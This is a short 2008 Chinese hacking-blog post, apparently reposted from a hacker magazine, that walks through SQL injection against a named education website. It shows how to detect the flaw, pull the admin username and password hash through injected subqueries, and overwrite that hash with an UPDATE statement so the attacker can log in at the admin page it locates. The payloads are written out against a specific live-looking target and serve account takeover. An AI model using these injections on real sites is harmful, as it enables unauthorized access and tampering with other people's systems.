from:黑客防线
在线破解MD5的网站上查。但有的MD5密码很偏,所以一些新手会放弃。我为新手介绍一种很简单就能修改难猜解MD5密码的方法。
常入侵的高手就忽略过..
随便找个地址
http://www.dtedu.org/news.asp?id=121
在地址后输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
字符串 ’’’ 之前有未闭合的引号
/news/wantpws.asp,行63
说明没有过滤单引号且数据库是MSSQL.
and 1=1出错。and 1=2正常。
接着输入
http://www.dtedu.org/news.asp?id=1 or admin_user in (select id from admin)
得到帐号为:admin
http://www.dtedu.org/news.asp?id=121 or admin_password in (select id from admin)
得到密码为:a4716077c2ba075c
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
键入 :
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。
扫一下后台为
http://www.dtedu.org/admin/admin_login.asp
SQL注射修改难猜解的MD5
Tags:技巧
添加书签: [QQ书签] [百度搜藏] [新浪ViVi] [365Key网摘] [天极网摘] [我摘] [POCO网摘] [和讯网摘]
2008-5-23 23:14:8 | 发布:admin | 分类:技术文章 | 评论:0 | 引用:0 | 浏览:
- 相关文章:
webshell下查找所有IIS站点配置 (2008-5-23 7:30:58)
Mysql5注射技巧总结 (2008-5-21 20:41:45)
openrowset/opendatasource的其它技巧 (2008-5-12 19:35:2)
突破一流信息监控系统实现文件“上传” (2008-4-26 6:44:15)
sql相关恢复xp_cmdshell命令及其他 (2008-4-18 0:37:49)
unicode新用法 (2008-4-16 12:52:36)
用ASP打开远端MDB文件的方法 (2008-4-16 12:39:41)
一个linux pentest 关于pty的小技巧 (2008-4-3 0:41:41)
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
![[POCO网摘]](javascript:d=document;t=d.selection?(d.selection.type!='None'?d.selection.createRange().text:''):(d.getSelection?d.getSelection():'');void(keyit=window.open('http://my.poco.cn/fav/storeIt.php?t='+escape(d.title)+'&u='+escape(d.location.href)+'&c='+escape(t)+'&img=http://www.h-strong.com/blog/logo.gif','keyit','scrollbars=no,width=475,height=575,status=no,resizable=yes'));keyit.focus();){kind=link}